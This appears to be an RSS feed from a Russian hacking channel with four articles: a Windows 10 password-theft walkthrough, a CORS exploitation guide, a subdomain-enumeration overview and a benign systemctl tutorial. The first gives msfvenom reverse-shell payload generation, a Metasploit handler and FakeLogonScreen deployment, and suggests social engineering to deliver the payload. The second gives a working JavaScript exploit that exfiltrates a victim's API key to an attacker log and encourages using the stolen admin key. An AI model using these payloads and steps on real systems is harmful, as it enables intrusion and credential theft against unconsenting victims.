<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>Hata</title><generator>teletype.in</generator><description><![CDATA[Место для хранения статей канала и паблика Hata Hack!]]></description><image><url>https://teletype.in/files/d7/61/d76174ed-04eb-487a-b0c9-6cbfdd0c66ce.jpeg</url><title>Hata</title><link>https://teletype.in/@hata_hack</link></image><link>https://teletype.in/@hata_hack?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/hata_hack?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/hata_hack?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Thu, 14 May 2026 02:05:00 GMT</pubDate><lastBuildDate>Thu, 14 May 2026 02:05:00 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@hata_hack/eHff1-nQx</guid><link>https://teletype.in/@hata_hack/eHff1-nQx?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack</link><comments>https://teletype.in/@hata_hack/eHff1-nQx?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack#comments</comments><dc:creator>hata_hack</dc:creator><title>Получить пароль Windows 10 с помощью FakeLogonScreen</title><pubDate>Thu, 27 Aug 2020 09:26:56 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/76/85/76852564-ea41-4a73-88b0-5df64a488594.jpeg"></media:content><description><![CDATA[<img src="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows.png"></img>В этой статье демонстрируется подробное руководство о том, как взломать пароли Windows 10 с помощью FakeLogonScreen.]]></description><content:encoded><![CDATA[
  <p>В этой статье демонстрируется подробное руководство о том, как взломать пароли Windows 10 с помощью FakeLogonScreen.</p>
  <p>Я буду использовать FakeLogonScreen и <a href="https://www.ehacking.net/2020/02/how-to-install-kali-linux-on-virtualbox-windows-host-in-2020.html" target="_blank">Kali Linux</a> для взлома паролей Windows 10. FakelogonScreen – это удобный и скрытый инструмент, который создает поддельный журнал на экране на целевой машине под управлением Windows 10. Этот инструмент заставляет целевого пользователя вводить правильные учетные данные и, после его получения, передает его злоумышленнику.</p>
  <p><a href="https://twitter.com/bitsadmin" target="_blank">Arris Huijgen</a> разработал этот полезный инструмент, он использует преимущества обычного поведения среды Windows, отображает экран входа в систему, когда он выходит из спящего режима, и запрашивает ввод учетных данных. В то время этот инструмент искал фишинговые учетные данные Windows от цели, и сила этого инструмента появилась, когда он принимает только действительные учетные данные.</p>
  <h2>Шаги для взлома пароля Windows 10</h2>
  <p>Теперь давайте попробуем этот инструмент и выполним эксплойт. Нам нужно развернуть две виртуальные машины, то есть Kali Linux и Windows 10. В моей виртуальной лабораторной среде Kali (атакующая машина) имеет IP: 192.168.0.103, а Windows (целевая машина) получила 192.168.0.100.</p>
  <h3>Загрузите FakeLogonScreen в Kali Linux</h3>
  <p>Для начала нам нужно скачать исполняемый файл FakeLogonScreen на нашей атакующей машине по ссылке:</p>
  <p><a href="https://github.com/bitsadmin/fakelogonscreen/releases" target="_blank">https://github.com/bitsadmin/fakelogonscreen/releases</a></p>
  <p>Теперь предположим, что целевой компьютер подключен к той же сети, что и атакующий компьютер.</p>
  <h2>Создание вредоносной полезной нагрузки для взлома Windows</h2>
  <p>Мы создадим <a href="https://www.ehacking.net/2020/04/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux.html" target="_blank">вредоносную полезную нагрузку с помощью инструмента msfvenom в</a> соответствии с информацией, полученной целевой системой. Мы установим lhost на IP нашего Kali, то есть 192.168.0.103, и установим lport равным 4444. Поскольку мы заинтересованы в использовании системы Windows, мы сгенерируем полезную нагрузку в виде исполняемого файла, чтобы легко выполнить ее на целевой машине. Используйте команду:</p>
  <pre># msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.0.103 lport = 4444 -f exe &gt;&gt; payload.exe</pre>
  <figure class="m_original">
    <img src="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows.png" width="630" />
  </figure>
  <p>Здесь ‘payload.exe’ – это имя сгенерированной полезной нагрузки. После этого мы запустим Python One-liner для создания HTTP-сервера, который будет размещать эту вредоносную полезную нагрузку на порту 80 целевой машины.</p>
  <pre>#python -m SimpleHTTPServer 80</pre>
  <figure class="m_original">
    <img src="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows-2.png" width="629" />
  </figure>
  <h2>Загрузите полезную нагрузку на целевой машине</h2>
  <p>Все готово сейчас, самый важный этап наступил, когда мы должны получить цель для загрузки этой вредоносной полезной нагрузки. В реальных сценариях злоумышленник может использовать различные методы социальной инженерии и позволить целевому пользователю загрузить этот вредоносный файл в свою систему.</p>
  <p>Для практической демонстрации мы получим доступ к каталогу нашего компьютера Kali с компьютера с Windows и загрузим полезную нагрузку.</p>
  <figure class="m_original">
    <img src="https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine.png" width="893" />
  </figure>
  <p>Это также будет показывать текущие журналы в нашей машине Kali.</p>
  <figure class="m_original">
    <img src="https://www.ehacking.net/wp-content/uploads/2020/07/Kali-machine.png" width="622" />
  </figure>
  <h2>Запустите Metasploit для использования</h2>
  <p>Вернемся прямо к Kali и запустим Metasploit-framework.</p>
  <p>Используйте модуль <code>multi/handler</code>.</p>
  <figure class="m_original">
    <img src="https://www.ehacking.net/wp-content/uploads/2020/07/Use-multi-handler-module..png" width="633" />
  </figure>
  <p>Установите полезную нагрузку <code>windows/meterpreter/reverse_tcp</code>.</p>
  <figure class="m_original">
    <img src="https://www.ehacking.net/wp-content/uploads/2020/07/Set-the-windows-meterpreter-reverse_tcp-payload..png" width="629" />
  </figure>
  <p>Установите lhost как наш IP т.е. 192.168.0.103 и lport как 4444</p>
  <figure class="m_original">
    <img src="https://www.ehacking.net/wp-content/uploads/2020/07/Set-lhost-as-our-IP-i.e.-192.168.0.103-and-lport-as-4444.png" width="632" />
  </figure>
  <p>После настройки всего этого, просто запустите эксплойт, вернитесь на компьютер с Windows и запустите исполняемый файл, то есть «payload.exe». Это быстро даст нам сеанс метролога.</p>
  <figure class="m_original">
    <img src="https://www.ehacking.net/wp-content/uploads/2020/07/exploit.png" width="621" />
  </figure>
  <h2>Загрузить исполняемый файл</h2>
  <p>Теперь загрузите исполняемый файл FakeLogonScreen, который мы загрузили ранее. Убедитесь, что вы указали правильный путь к исполняемому файлу.</p>
  <pre>&gt;upload /root/Downloads/FakeLogonScreen.exe</pre>
  <p>После этого получите доступ к оболочке и запустите FakeLogonScreen.exe, как показано ниже:</p>
  <figure class="m_original">
    <img src="https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon.png" width="890" />
  </figure>
  <p>И БУМ! На целевом компьютере все запущенные окна будут закрыты, и появится экран входа в систему, запрашивающий учетные данные, и он отобразится в качестве допустимого окна. Пользователь не колебался ни секунды, чтобы ввести свои учетные данные и вернуть свою работу.</p>
  <figure class="m_original">
    <img src="https://www.ehacking.net/wp-content/uploads/2020/07/target-machine.png" width="1015" />
  </figure>
  <p>Чтобы проверить надежность этого инструмента, мы будем вводить неправильный пароль.</p>
  <figure class="m_original">
    <img src="https://www.ehacking.net/wp-content/uploads/2020/07/password.png" width="1019" />
  </figure>
  <p>И это покажет ошибку «Пароль неверный, попробуйте еще раз». Это сила инструмента FakeLogonScreen, который заставляет цель вводить свой правильный пароль. У пользователя нет другого выбора, кроме как ввести свой пароль.</p>
  <p>Давайте введем правильный пароль, и вы получите стандартное окно, так как ничего не произошло раньше.</p>
  <figure class="m_original">
    <img src="https://www.ehacking.net/wp-content/uploads/2020/07/correct-password.png" width="1015" />
  </figure>
  <p>Это также показывает, что FakeLogonScreen работает аналогично кейлоггеру. Злоумышленник может легко отслеживать все журналы и может получить правильный пароль целевого пользователя.</p>
  <figure class="m_original">
    <img src="https://www.ehacking.net/wp-content/uploads/2020/07/user.png" width="629" />
  </figure>
  <h2>Некоторая полезная информация</h2>
  <p>Этот инструмент также может эффективно работать на нескольких настольных системах. При запуске его на разных рабочих столах все затронутые экраны становятся черными сразу после выполнения эксплойта с атакующей машины. Это работает, даже если целевой пользователь установил настроенный фон.</p>
  <p>Zip-файл эксплойта также содержит другой исполняемый файл с именем «FakeLogonScreenToFile.exe», который работает так же, как и предыдущий исполняемый файл. Тем не менее, он имеет некоторые дополнительные функции, т.е. не только показывает пароль, но и сохраняет его в файле <code>%LOCALAPPDATA%\Microsoft\user.db</code>.</p>
  <p>Этот инструмент также может быть интегрирован с Cobalt Strike для эффективной работы.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hata_hack/0U04lqDeH</guid><link>https://teletype.in/@hata_hack/0U04lqDeH?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack</link><comments>https://teletype.in/@hata_hack/0U04lqDeH?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack#comments</comments><dc:creator>hata_hack</dc:creator><title>Что такое CORS?</title><pubDate>Thu, 27 Aug 2020 09:21:39 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/97/17/9717ac27-5099-427b-b97b-fdc45f5fc174.jpeg"></media:content><description><![CDATA[<img src="https://telegra.ph/file/83080defec2be316b4ec4.jpg"></img>Сегодня внимание будет сосредоточено на сross-origin resource sharing (CORS). Разберемся, что это такое и как можно эксплуатировать неправильную конфигурацию CORS. На конкретном примере разберем уязвимость и посмотрим, что с этого можно получить. Также, пройдемся по вознаграждениям за уязвимости CORS из последних отчетов BugBounty.]]></description><content:encoded><![CDATA[
  <p>Сегодня внимание будет сосредоточено на <strong>сross-origin resource sharing (CORS)</strong>. Разберемся, что это такое и как можно эксплуатировать неправильную конфигурацию CORS. На конкретном примере разберем уязвимость и посмотрим, что с этого можно получить. Также, пройдемся по вознаграждениям за уязвимости CORS из последних отчетов BugBounty.</p>
  <h3>Что такое CORS?</h3>
  <p><strong>Cross-origin resource sharing (CORS) </strong>— это механизм браузера, который позволяет предоставить веб-странице доступ к ресурсам другого домена. Иногда, бывает что приложение состоит из нескольких сайтов, которые находятся на разных портах или доменах. И как раз от конфигурации CORS зависит, какие скрипты можно будет использовать, а какие нет. <br />Если эта политика настроена неправильно, то потенциально приложение может быть уязвимо к междоменным атаками. Чтобы рассказать, почему так популярен CORS нужно затронуть еще один термин.</p>
  <p><strong>Same-origin policy</strong> — это встроенная политика единого местопроисхождения браузера, которая была придумана для предотвращения атак сайтов друг на друга. Например, если бы этой политики не было, то при заходе на вредоносный сайт <em>evil.com,</em> с помощью скрипта можно было бы вытащить вашу переписку в protonmail.com или историю платежей в онлайн-банкинге. <br />Поэтому во всех браузерах кроме Internet Explorer есть такая защиту.</p>
  <p>Чтобы лучше понять на практике, расскажу какие запросы пройдут сквозь same-origin policy, а какие нет, на примере домена evil.com.</p>
  <figure class="m_original">
    <img src="https://telegra.ph/file/83080defec2be316b4ec4.jpg" width="621" />
    <figcaption>Same-origin policy на практике</figcaption>
  </figure>
  <p>Поэтому разработчикам приходиться работать с другими страницами и обрабатывать их результаты с помощью сross-origin resource sharing.</p>
  <p>Как вывод, <strong>CORS </strong>— это способ обхода same-origin policy.</p>
  <h3>Какие уязвимости могут быть при неправильной конфигурации CORS?</h3>
  <p>Представим типичную ситуацию разработки. Разработчик поднимает приложение например на порту 8000 и указывает, что оно должно работать с клиентом, который будет находиться на порту 3000. <br />Пробует выполнить тестовый запрос, запрос выполняется, но результат недоступен.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/085b48ed8f5972d6b6166.jpg" width="1280" />
    <figcaption>Ошибка same-origin policy</figcaption>
  </figure>
  <p>После этого он начинает гуглить ошибку и на первой странице видит ответ, что нужно добавить два заголовка для решения всех проблем: <strong>Access-Control-Allow-Origin и Access-Control-Allow-Credentials: true. </strong></p>
  <p>Без детального изучения это добавляется в код<strong>, </strong>тем самым разрешая доступ на выполнения запросов и передачу результатов с любого домена, включая передачу Cookies, ключей и токенов другим доменам. И тут начинается самое интересное.</p>
  <h3>Как написать JavaScript эксплоит для уязвимости CORS?</h3>
  <p>Сейчас я покажу на практике, как можно отправить запрос и посмотреть, является ли сайт уязвимым. <br />Пропускам трафик к сайту через BurpSuite, смотрим историю реквестов и находим один из таких запросов к сайту, где есть Origin. Меняем Origin на рандомный, в моем случае https://evil.com.</p>
  <pre>GET /accountInfo 
HTTP/1.1 
Host: carsmarket.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: carsmarket.net/my-account?id=plastik
Origin: https://evil.com
Connection: close
Cookie: session=234e32erefsdagfsdbgsaf342rf2rf2
Cache-Control: max-age=0
</pre>
  <p>После отправки Request получаем Response от сервера со следующим содержанием. <strong>Access-Control-Allow-Origin: <em>https://evil.com</em></strong> и <strong>Access-Control-Allow-Credentials: <em>true</em></strong>. <br />В этих заголовках указывается, что доступ разрешен из запрашивающего домена (evil.com) и что междоменные запросы могут включать файлы cookie (Access-Control-Allow-Credentials: true). Это означает, что сайт уязвим, так как позволяет отправлять ответы на абсолютно любой домен.</p>
  <pre>GET /accountInfo HTTP/1.1
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
X-XSS-Protection: 0
Connection: close
Content-Length: 89

{
   &quot;username&quot;: &quot;plastik&quot;,
   &quot;email&quot;: &quot;&quot;,
   &quot;apikey&quot;: &quot;uk6bkwawLOR4WLILf5Rd1zkcg7eWDWen&quot;
}
</pre>
  <p>Простыми словами, если на странице есть какие-то <strong>токены</strong>, <strong>ключи</strong>, то мы <strong>можем легко их вытащить</strong>.</p>
  <p>Например, у нас есть какой-то интернет магазин, который после покупки услуги предоставляет API ключ для работы с программой. Что-то на подобии Shodan и Censys, которые предоставляют API ключ для консольной версии после покупки премиум-пакета.</p>
  <p>Для разработки эксплоита нужно понимать структуру сайта, для этого можем зарегистрироваться и посмотреть на какой именно странице отображается API-ключ. Также нам нужно создать вредоносный сайт, куда зайдет жертва, и от ее имени отправим запрос с целью получения API-ключа.</p>
  <p>Более детально посмотрим на сам код JavaScript эксплоита (создаем скрипт, который будет отправлять запрос на страницу сайт с целью получения API-ключа):</p>
  <pre>&lt;script&gt;
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open(&#x27;get&#x27;,&#x27;https://carsmarket.net/accountInfo&#x27;,true);
  req.withCredentials = true;
  req.send();

  function reqListener() {
  location=&#x27;/log?key=&#x27;+this.responseText;
  };
&lt;/script&gt;
</pre>
  <p>Размещаем этот код на своем вебсайте. Для проверки работоспособности можно самому перейти на эту страницу и получить собственный API ключ. <br />Для проведения атаки, отправляем ссылку на сайт с нашей страницей жертве и ожидаем информации в лог-сервере. После перехода нашей жертвы по ссылке получаем вот такую запись:</p>
  <pre>2020-07-15 05:31:09 +0000 &quot;GET /log?key={%20%20%22username%22:%20%22admin%22,%20%20%22email%22:%20%22%22,%20%20%22apikey%22:%20%22sdgfer32f3ef34r23423df23%22} HTTP/1.1&quot; 200 &quot;User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36&quot;
</pre>
  <p>Делаем URL-decode и получае API ключ admin. После этого бесплатно используем неограниченные возможности сервиса.</p>
  <pre>&quot;username&quot;: &quot;admin&quot;, &quot;email&quot;: &quot;&quot;, &quot;apikey&quot;: &quot;sdgfer32f3ef34r23423df23&quot;
</pre>
  <p>Вот мы и разобрали, как с помощью неправильной конфигурации CORS можно получить конфиденциальные данные.</p>
  <h3>Cколько платят BugBounty за уязвимости с CORS?</h3>
  <p>Сумма вознаграждения в BugBounty программах будет зависеть от контекста. Некоторые компании выносят конфигурацию CORS вне скоупа тестирования. Если с помощью CORS удалось получить клиентские данные или учетные данные пользователя, то сумма может быть в диапазоне от $500 и до $2500.</p>
  <h4>Несколько примеров с Hackerone.</h4>
  <p><strong>Первый</strong> <a href="https://hackerone.com/reports/577969" target="_blank">кейс</a> позволял получить информацию по клиентам сервиса. Информация была достаточно ценной для компании поэтому хакер получил вознаграждение в размере <strong>$2100</strong>.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/a8bb0c6f827f324283ca4.jpg" width="1280" />
    <figcaption>CORS misconfiguration allows to steal customers data</figcaption>
  </figure>
  <p><strong>Второй</strong> <a href="https://hackerone.com/reports/235200" target="_blank">кейс</a> позволял получить информацию о пользователях: идентификаторы, id-проектов и т.д. Сумма была чуть меньше, но неплохое вознаграждение для хакера в размере <strong>$1000</strong>.</p>
  <figure class="m_column">
    <img src="https://telegra.ph/file/18c165fb9b63f4200a697.jpg" width="1280" />
    <figcaption>CORS misconfiguration allows to steal user information</figcaption>
  </figure>
  <h4>Заключение</h4>
  <p>В статье мы разобрались, что такое <strong>сross-origin resource sharing</strong> и s<strong>ame-origin policy. </strong>Узнали как найти сайт, который имеет уязвимую конфигурацию CORS. На конкретном примере, с помощью Javascript эксплоита угнали API ключ админа сервиса.</p>
  <blockquote>Более детально попрактиковать атаки на CORS можно в лабораториях <a href="https://portswigger.net/web-security/cors" target="_blank">Portswigger</a>.</blockquote>
  <p>CORS требует достаточно щепетильной настройки. Если на сайте стандартная конфигурация — это первый звоночек. Несмотря на то, что уязвимость достаточно специфическая в эксплуатации, тем не менее позволяет получить конфиденциальные данные. В некоторых случаях будет являться критическим риском. И вознаграждение в таких случаях может составлять до $2500 или нести риск потенциальной утечки клиентских данных.</p>
  <p><a href="https://t.me/plastikc%25D0%25B0sh" target="_blank">Источник</a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hata_hack/dvhgLHHLC</guid><link>https://teletype.in/@hata_hack/dvhgLHHLC?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack</link><comments>https://teletype.in/@hata_hack/dvhgLHHLC?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack#comments</comments><dc:creator>hata_hack</dc:creator><title>Инструменты и сервисы для поиска поддоменов</title><pubDate>Thu, 27 Aug 2020 09:09:49 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/b6/73/b673a03c-6ea3-42f3-90e9-90d482318f8a.jpeg"></media:content><description><![CDATA[<img src="https://tgraph.io/file/845f22cd0dbb25c449292.jpg"></img>Привет, Аноним. Сегодня я расскажу о том, что такое поддомены и почему их важно проверять. В статье я покажу самые популярные инструменты, которые используют специалисты с мира хакинга, bug bounty и т.д. После прочтения этой статьи ты сможешь установить себе утилиты и проверить сайты на наличие &quot;интересных&quot; поддоменов. Также я поделюсь ссылками на словари, с помощью которых лучше перебирать поддомены.]]></description><content:encoded><![CDATA[
  <p>Привет, Аноним. Сегодня я расскажу о том, что такое поддомены и почему их важно проверять. В статье я покажу самые популярные инструменты, которые используют специалисты с мира хакинга, bug bounty и т.д. После прочтения этой статьи ты сможешь установить себе утилиты и проверить сайты на наличие &quot;интересных&quot; поддоменов. Также я поделюсь ссылками на словари, с помощью которых лучше перебирать поддомены.</p>
  <h3>Какие плюшки можно найти на поддоменах?</h3>
  <p>Поиск поддоменов — неотъемлемая часть подготовки ко взлому. Людям свойственно ошибаться. Особенно, если это касается вопроса разработки, даже в больших компаниях. Иногда компании выкатывают бета-версии, тестируют новый функционал, который размещают на поддоменах. Например, есть сайт компании craft.com. Компания выпускает новую функцию и добавляет ее на поддомен test.craft.com и интегрирует вместе с основным сайтом. В какой-то момент оказывается, что такая функция уже не нужна, но поддомен остается до лучших времен. Со временем, функционал устаревает, его никто не поддерживает и рано или поздно кто-то потенциально сможет воспользоваться этим.</p>
  <p>Также, иногда люди добавляют сайты смежных тематик, а потом отказываются от поддержки. Таких кейсов достаточно много, <a href="https://habr.com/ru/company/group-ib/blog/496712/" target="_blank">один</a> из них был опубликован не так давно. Если кратко: пентестеры получили доступ к ресурсам компании посредством одного забытого поддомена. Также была интересная история, когда на одном из поддоменов можно было выкачать код сайта <a href="https://avicoder.me/2016/07/22/Twitter-Vine-Source-code-dump/" target="_blank">Vine</a>. Таких историй множество. Поэтому очень важно обращать внимание на поддомены и проверять, что на них находится. Иногда это очень &quot;перспективное&quot; места, которые могут потенциально помочь получить доступ к серверу.</p>
  <h3>Технические инструменты для поиска поддоменов</h3>
  <p>Существует достаточно много инструментов и сервисов, которые осуществляют поиск по поддоменам и выдают другую полезную информацию. Я сделал обзор самых популярных, которые регулярно попадают в отчеты bug bounty топовых специалистов индустрии. Утилиты очень быстро устанавливаются, не требуют очень много зависимостей и позволяют в разумные сроки получить список существующих поддоменов. Установка всех инструментов и утилит производилась на Kali Linux. Для других дистрибутивов команды и зависимости могут отличаться.</p>
  <h4>Knock.py</h4>
  <p>Очень удобный и быстрый инструмент, которые ищет поддомены по словарю. Особенно актуально для сайтов, которые размещены во внутр. сетях и не имеют выхода в сеть. Для установки этого инструмента нужно выполнить следующие команды:</p>
  <pre>$ sudo apt-get install python-dnspython
$ git clone https://github.com/guelfoweb/knock.git
$ cd knock
$ sudo python setup.py install
$ knockpy -h
</pre>
  <p>После успешной установки и можно приступать к тестированию. Для этого можно выполнить базовую команду. В первом случаем, утилита будет искать по дефолтному словарю, во втором можем добавить свой. Для базовых целей рекомендую использовать словари с двух репозиториев: <a href="https://github.com/rbsec/dnscan" target="_blank"><strong>1</strong></a> и <a href="https://github.com/danTaler/WordLists/blob/master/Subdomain.txt" target="_blank"><strong>2</strong></a>. Как правило, 95% задач можно покрыть этими словарями, остальные 5% покрываются онлайн-сервисами и сгенерированными словарями.</p>
  <pre>$ knockpy domain.com 
$ knockpy domain.com -w wordlist.txt
</pre>
  <figure class="m_column">
    <img src="https://tgraph.io/file/845f22cd0dbb25c449292.jpg" width="1063" />
  </figure>
  <p>На выходе получаем сабдомены с IP и указанием сервера. Поиск идет относительно быстро, но для проверки по большим словарям понадобится время. Также эта утилита поддерживает работу с VirusTotal, но для этого нужно иметь платную подписку. Я всегда использовал только базовую версию и утилита прекрасно справлялась со своей задачей.</p>
  <h4>Sublist3r</h4>
  <p>Эта утилита ищет поддомены в поисковых системах Google, Yahoo, Bing, Baidu и Ask. Также при поиске используются сервисы Netcraft, Virustotal, ThreatCrowd, DNSdumpster и ReverseDNS. Для получения более точных результатов, рекомендую использовать Knock.py и Sublist3r.</p>
  <p>Для установки нужно выполнить команды:</p>
  <pre>$ git clone https://github.com/aboul3la/Sublist3r.git
$ cd Sublist3r/
$ sudo pip install -r requirements.txt
$ python sublist3r.py -h
</pre>
  <p>После установки проверим работоспособность на практике. Утилита также имеет достаточно дополнительных опций, о которых можно почитать в <a href="https://github.com/aboul3la/Sublist3r" target="_blank">тут</a>. Запустим поиск с помощью команды:</p>
  <pre>$ python sublist3r.py -d example.com
</pre>
  <figure class="m_column">
    <img src="https://tgraph.io/file/8705f71690539d5a4b15d.jpg" width="969" />
  </figure>
  <p>Если сравнивать скорость работы, то Sublist3r более быстрее выдает результаты. Да и в случае использования Knock.py, то список результатов ограничен словарем, который используется в переборе сабдоменов.</p>
  <h4>DNSdumpster</h4>
  <p><strong>DNSdumpster</strong> — это бесплатный онлайн-сервис, который может показать поддомены, баннеры, а также другую информацию.</p>
  <p>Для использования нужно перейти на <a href="https://dnsdumpster.com/" target="_blank"><strong>dnsdumpster</strong></a> и ввести нужный сайт. После этого можно анализировать выдачу.</p>
  <figure class="m_column">
    <img src="https://tgraph.io/file/39816559083e8efc2a0a5.jpg" width="1535" />
  </figure>
  <p>Список поддоменов, одного известного новостной сайта:</p>
  <figure class="m_column">
    <img src="https://tgraph.io/file/fc8e0bc543bf3b4070b9b.jpg" width="1482" />
  </figure>
  <h3>Netcraft</h3>
  <p><strong>Netcraft</strong> — компания, занимающаяся интернет-мониторингом, которая отслеживает время простоя и обеспечивает обнаружение серверной операционной системы, а также предоставляет ряд других услуг. В Netcraft есть инструмент онлайн-поиска, который позволяет пользователям запрашивать информацию о хосте.</p>
  <p>Для проверки нужно перейти на сайт netcraft и ввести нужный домен в формате *.site.com:</p>
  <figure class="m_column">
    <img src="https://tgraph.io/file/f7a8995996a103c821fa1.jpg" width="1573" />
  </figure>
  <p>После этого можно получить такие результаты выдачи. Конечно, DNSdumpster предоставляет более детальные результаты, но не стоит отбрасывать Netcraft. Иногда тут можно найти интересные записи, которые не находят другие утилиты или сервисы. Также по каждому из поддоменов можно посмотреть отчет, с более детальной информацией.</p>
  <figure class="m_column">
    <img src="https://tgraph.io/file/7d021651f22f1aff92e87.jpg" width="1678" />
  </figure>
  <h3>Заключение</h3>
  <p>В статье есть достаточно инструментов, которые позволяют за несколько минут собрать активные поддомены. Очень часто на них могут быть старые сервисы, файлы, формы загрузки и другие конфиденциальные данные. Очень часто старые поддомены приводят к компрометации всего сервера. Поэтому я рекомендую обращать внимание на поддомены, смотреть, что на них размещено. Ведь старый функционал с большей вероятностью будет уязвим к существующим уязвимостям.</p>
  <p><a href="https://t.me/plastikc%D0%B0sh" target="_blank">Источник</a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hata_hack/6TCFYaMB0</guid><link>https://teletype.in/@hata_hack/6TCFYaMB0?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack</link><comments>https://teletype.in/@hata_hack/6TCFYaMB0?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack#comments</comments><dc:creator>hata_hack</dc:creator><title>Systemctl-управление службами в Linux</title><pubDate>Thu, 27 Aug 2020 08:54:27 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/da/40/da4069ad-01d3-4f19-8cc5-754a95cdef48.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/3f/b9/3fb97f90-8b76-491a-a375-6122ac445fec.png"></img>Базовый объект, с которым работает systemd, называется “юнитом” (unit). Есть много видов юнитов, но самым распространенным является служба (service, файл юнита заканчивается на .service). Основным инструментом для управления службами на сервере является команда systemctl.]]></description><content:encoded><![CDATA[
  <h3>Основы управления сервисами (юнитами)</h3>
  <figure class="m_column">
    <img src="https://teletype.in/files/3f/b9/3fb97f90-8b76-491a-a375-6122ac445fec.png" width="1440" />
  </figure>
  <p>Базовый объект, с которым работает systemd, называется “юнитом” (unit). Есть много видов юнитов, но самым распространенным является служба (service, файл юнита заканчивается на .service). Основным инструментом для управления службами на сервере является команда <em>systemctl</em>.</p>
  <p>У всех команд обычной системы инициализации есть эквиваленты в <em>systemctl</em>. В примерах мы будем использовать службу nginx.service. Если у вас её нет, установите ее при помощи менеджера пакетов.</p>
  <p>Для запуска службы нужно ввести:</p>
  <pre>systemctl start nginx.service
</pre>
  <p>Остановка осуществляется следующей командой:</p>
  <pre>systemctl stop nginx.service
</pre>
  <p>Перезапуск службы:</p>
  <pre>systemctl restart nginx.service
</pre>
  <p>Чтобы повторно загрузить файлы конфигурации службы, не прерывая ее работы, нужно выполнить команду:</p>
  <pre>systemctl reload nginx.service
</pre>
  <h3>Включение и отключение сервисов</h3>
  <p>По умолчанию большинство файлов юнитов systemd не запускаются при загрузке автоматически. Для настройки этой функции требуется “включить” юнит. Он привязывается к “цели” загрузки и запускается, когда выполняется это целевое действие.</p>
  <p>Для включения автоматическооо запуска при загрузке введите:</p>
  <pre>systemctl enable nginx.service
</pre>
  <p>Если нужно снова отключить службу:</p>
  <pre>systemctl disable nginx.service
</pre>
  <h3>Получение данных о состоянии системы</h3>
  <p>Мы можем получить от сервера с <em>systemd</em> огромное количество информации, чтобы узнать о состоянии системы.</p>
  <p>Например, чтобы получить список юнитов, которые systemd считает активными, нужно выполнить следующую команду (можно даже не использовать опцию list-units, потому что она подразумевается по умолчанию):</p>
  <pre>sudo systemctl list-units
</pre>
  <figure class="m_original">
    <img src="https://itproffi.ru/wp-content/uploads/2019/01/systemctl1.jpg" width="1253" />
  </figure>
  <p>Для вывода списка юнитов, которые systemd загружал или пытался загрузить в память, в том числе не активные в данный момент, нужно указать опцию —all:</p>
  <p>sudo systemctl list-units —all</p>
  <figure class="m_original">
    <img src="https://itproffi.ru/wp-content/uploads/2019/01/systemctl2.jpg" width="1451" />
  </figure>
  <p>Чтобы вывести все установленные в системе юниты, в том числе те, которые systemd не пытался загрузить в память, выполните команду:</p>
  <p>sudo systemctl list-unit-files</p>
  <figure class="m_original">
    <img src="https://itproffi.ru/wp-content/uploads/2019/01/systemctl3.jpg" width="751" />
  </figure>
  <p>Представленные выше команды показывали общее состояние системы, но можно также получить информацию о состоянии отдельных юнитов.</p>
  <p>Для просмотра обзора текущего состояния самого юнита можно воспользоваться опцией status команды systemctl. Вы увидите, активен ли юнит, получите информацию о процессе и последние записи журнала:</p>
  <pre>systemctl status nginx.service
</pre>
  <figure class="m_original">
    <img src="https://itproffi.ru/wp-content/uploads/2019/01/systemctl4.jpg" width="985" />
  </figure>
  <h3>Файлы юнитов и зависимости</h3>
  <p>Файл юнита содержит параметры, используемые systemd для запуска и управления. Для просмотра полного содержимого файла юнита нужно выполнить команду:</p>
  <pre>systemctl cat nginx.service
</pre>
  <figure class="m_original">
    <img src="https://itproffi.ru/wp-content/uploads/2019/01/systemctl5.jpg" width="703" />
  </figure>
